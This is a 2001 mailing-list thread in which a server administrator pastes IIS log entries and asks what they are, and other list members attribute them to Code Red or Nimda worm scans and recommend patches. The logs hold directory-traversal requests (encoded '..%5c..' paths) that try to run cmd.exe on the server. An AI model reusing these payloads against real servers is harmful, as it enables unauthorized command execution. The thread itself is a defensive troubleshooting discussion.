[ale] *OT* But, I need some help.

Frank Zamenski fzamenski at voyager.net
Mon Oct 22 07:31:03 EDT 2001



If this is not Nimda, how does one tell the difference between code
red/blue and Nimbda attacks on webserver logs? Not that's it's terribly
significant to me as I don't do IIS, but I do look at our Solaris iPlanet
webserver logs on occasion, and have seen some of this stuff on
occasion in the past.

Thanks.
-fgz


From: "Scott Harris" <grynux at earthlink.net>
To: ale at ale.org
To: "Jeb" <jeb_barger at yahoo.com>; "ale ale ale" <ale at ale.org>
Sent: Sunday, October 21, 2001 4:45 PM
Subject: Re: [ale] *OT* But, I need some help.


> those are hits from the code red worm. If you have your server patched for
> it, then they are hits from code blue. Go to M$ for the patches.
> ----- Original Message -----
> From: "Jeb" <jeb_barger at yahoo.com>
> To: "ale ale ale" <ale at ale.org>
> Sent: Sunday, October 21, 2001 5:30 PM
> Subject: [ale] *OT* But, I need some help.
>
> >
> >
> > After going through my logs on my winboze iis server, I have script
> kiddies
> > (i think), hitting my boxen.
> > However, I don't know what it is.  Could you lend me some of your
advice?
> >
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/root.exe
> > /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /MSADC/root.exe
> > /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> > /c/winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> > /d/winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> > /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
> > /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> > /winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> > /winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> > 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> > /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
> >
> > Thanks!
> >
> >



---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
sent to listmaster at ale dot org.






More information about the Ale mailing list